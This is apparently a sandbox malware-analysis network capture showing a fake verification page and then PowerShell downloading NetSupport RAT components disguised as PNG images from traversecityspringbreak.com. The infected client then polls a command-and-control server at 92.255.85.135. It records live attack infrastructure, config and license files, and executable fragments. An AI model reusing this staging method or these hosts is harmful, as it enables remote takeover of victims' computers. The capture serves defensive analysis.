                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:19.251096010 CET | 566 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 328
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-148"
                                                                                                                                                              Accept-Ranges: bytes
Data Ascii:
; nskbfltr.inf
;
; NS Keyboard Filter
;
;
; This inf file installs the WDF Framework binaries
[Version]
Signature="$Windows NT$"
Provider=NSL
;
;--- nskbfltr Coinstaller installation ------
;
[nskbfltr.NT.Wdf]
KmdfService = nskbfltr, nskbfltr_wdfsect
[nskbfltr_wdfsect]
KmdfLibraryVersion = 1.5
Oct 28, 2024 19:46:19.280273914 CET | 155 | OUT | GET /o/5.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:19.442967892 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 6458
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-193a"
                                                                                                                                                              Accept-Ranges: bytes
Data Ascii:
[General]
ClientParams=
CLIENT32=
Installdir=
NOARP=
SuppressAudio=
[Features]
Client=1
Configurator=
Control=
Gateway=
PINServer=
RemoteDeploy=
Scripting=
Student=
TechConsole=
Tutor=
[StartMenuIcons]
ClientIcon=
ConfigIcon=
ControlIcon=
RemoteDeployIcon=
ScriptingIcon=
TechConsoleIcon=
TutorIcon=
[DesktopIcons]
ControlDeskIcon=
TechConsoleDeskIcon=
TutorDeskIcon=
; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.
; Client=<1/Blank>
; e.g.
; Client=1
; Controls whether the client component is installed (1) on the target machine or not (Blank)
;
; CLIENT32=<blank/not blank>
; e.g.
; CLIENT32=
; Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic
;
; ClientIcon=<1/Blank>
; e.g.
; ClientIcon=1
; Controls whether shortcut icons are placed
Oct 28, 2024 19:46:19.484765053 CET | 155 | OUT | GET /o/6.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:19.647103071 CET | 495 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 257
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-101"
                                                                                                                                                              Accept-Ranges: bytes
Data Ascii:
1200
0x3bcb348e
; NetSupport License File.
; Generated on 11:54 - 21/03/2018
[[Enforce]]
[_License]
control_only=0
expiry=
inactive=0
licensee=EVALUSION
maxslaves=5000
os2=1
product=10
serial_no=NSM165348
shrink_wrap=0
transport=0
Oct 28, 2024 19:46:19.676594019 CET | 155 | OUT | GET /o/7.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:19.838654995 CET | 241 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 33144
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-8178"
                                                                                                                                                              Accept-Ranges: bytes
Oct 28, 2024 19:46:19.907960892 CET | 155 | OUT | GET /o/8.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:20.094052076 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:19 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 18808
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045c-4978"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sv7d7d7d,5d,4d>o0d7ed,3d,6d,6d,6dRich7dPELfU! `@p"a P@ x)P@ @.text$ `.rdata @@.data0@.rsrc@@@.relocP@B
Oct 28, 2024 19:46:20.149188042 CET | 155 | OUT | GET /o/9.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:20.316950083 CET | 245 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:20 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 3735416
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:36:03 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "67160463-38ff78"
                                                                                                                                                              Accept-Ranges: bytes
Oct 28, 2024 19:46:25.058712006 CET | 156 | OUT | GET /o/10.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:25.237970114 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:25 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 77280
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045e-12de0"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gV###L2*r&#tLKuLJ>L{"L|"Rich#PELToeJ!@ Q@<8]@@.text `.rdata,%&@@.data-@.rsrc8@@.relocp@B
Oct 28, 2024 19:46:25.533421993 CET | 156 | OUT | GET /o/11.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:25.701092958 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:25 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 396664
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045f-60d78"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zzzzzz{YzKzzzzzRichzPELY?XV!'@oTx0@x)@\E`d@h.text `.rdata/@@.datah|@.rsrc@0@@.reloc F@H@B
Oct 28, 2024 19:46:26.320980072 CET | 156 | OUT | GET /o/12.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:26.502312899 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:26 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 120288
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:36:03 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "67160463-1d5e0"
                                                                                                                                                              Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49729 | 92.255.85.135 | 443 | 7368 | C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 19:46:35.210639000 CET | 218 | OUT | POST http://92.255.85.135/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 92.255.85.135
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.16 | 49730 | 172.67.68.212 | 80 | 7368 | C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 19:46:35.340961933 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                                                                                              Host: geo.netsupportsoftware.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
Oct 28, 2024 19:46:36.329104900 CET | 788 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:36 GMT
                                                                                                                                                              Content-Type: text/html; Charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              CF-Ray: 8d9d16ea1801e9a4-DFW
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Cache-Control: private
                                                                                                                                                              Set-Cookie: ASPSESSIONIDQSACCQTB=LCDFNODDLKCMHEMABOOHJHDF; path=/
                                                                                                                                                              cf-apo-via: origin,host
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvIhPyf4Xj8xYqUnCu5UMzWUCamcLZoZO0SXIcZj1wbYqlnOMY6MRsHZ9%2FMMEz7vOtl4XQh5Yv9Vpxc5qHJ47CHc1AuQQfqjjH%2BrXG8HZwLuH2%2BduXd8mT%2B9TbiTtAaArKKhBilAQA%2BPQWl9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: f32.7767,-96.7970


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49698 | 166.1.160.75 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:45:15 UTC | 679 | OUT | GET /Ray-verify.html HTTP/1.1
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-10-28 18:45:15 UTC | 279 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 10478
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:55:44 GMT
                                                                                                                                                              ETag: "28ee-624f7fad44000"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Vary: Accept-Encoding
2024-10-28 18:45:15 UTC | 10478 | IN |
                                                                                                                                                              Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><met


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49699 | 166.1.160.75 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:45:15 UTC | 613 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://inspyrehomedesign.com/Ray-verify.html
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:15 UTC170INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Content-Length: 284
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-10-28 18:45:15 UTC | 284 | IN
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at inspyrehomedesign.com Port


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              2 | 192.168.2.16 | 49712 | 184.28.90.27 | 443
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-10-28 18:45:23 UTC | 161 | OUT
                                                                                                                                                              HEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                              2024-10-28 18:45:23 UTC467INHTTP/1.1 200 OK
                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                              X-CID: 11
                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                              Cache-Control: public, max-age=165657
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:23 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              X-CID: 2


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              3 | 192.168.2.16 | 49713 | 184.28.90.27 | 443
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-10-28 18:45:24 UTC | 239 | OUT
                                                                                                                                                              GET /fs/windows/config.json HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                              2024-10-28 18:45:25 UTC515INHTTP/1.1 200 OK
                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                              X-CID: 11
                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                              Cache-Control: public, max-age=151870
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:24 GMT
                                                                                                                                                              Content-Length: 55
                                                                                                                                                              Connection: close
                                                                                                                                                              X-CID: 2
                                                                                                                                                              2024-10-28 18:45:25 UTC | 55 | IN
                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              4 | 192.168.2.16 | 49714 | 172.202.163.200 | 443
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-10-28 18:45:26 UTC | 306 | OUT
                                                                                                                                                              GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                              2024-10-28 18:45:27 UTC560INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Expires: -1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                              MS-CorrelationId: 37c42236-e73d-484d-b27d-02d3bcfef9b5
                                                                                                                                                              MS-RequestId: a68c592c-8736-48a4-bfc0-70ccb2ca9f0f
                                                                                                                                                              MS-CV: Tw6rEsPhvkGPRaLk.0
                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:26 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 24490
                                                                                                                                                              2024-10-28 18:45:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                              2024-10-28 18:45:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              5 | 192.168.2.16 | 49715 | 172.217.16.196 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-10-28 18:45:31 UTC | 613 | OUT
                                                                                                                                                              GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                              Host: www.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-10-28 18:45:31 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:31 GMT
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: -1
                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Ad_8QMAajnygl2maybIahw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                              Server: gws
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2024-10-28 18:45:31 UTC | 112 | IN
                                                                                                                                                              Data Ascii: 301)]}'["",["episode 7 tulsa king","apple intelligence ios 18.1","baltimore ravens vs cleveland browns","mort
                                                                                                                                                              2024-10-28 18:45:31 UTC | 664 | IN
                                                                                                                                                              Data Ascii: gage rates today","pope francis synod","videos","carolina panthers denver broncos","american airlines brisbane flight"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u0
                                                                                                                                                              2024-10-28 18:45:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.16 | 49716 | 166.1.160.75 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:45:32 UTC | 664 | OUT | GET / HTTP/1.1
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-10-28 18:45:33 UTC | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:32 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 67842
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Sun, 27 Oct 2024 22:53:27 GMT
                                                                                                                                                              ETag: "10902-6257d3868c74e"
                                                                                                                                                              Accept-Ranges: bytes
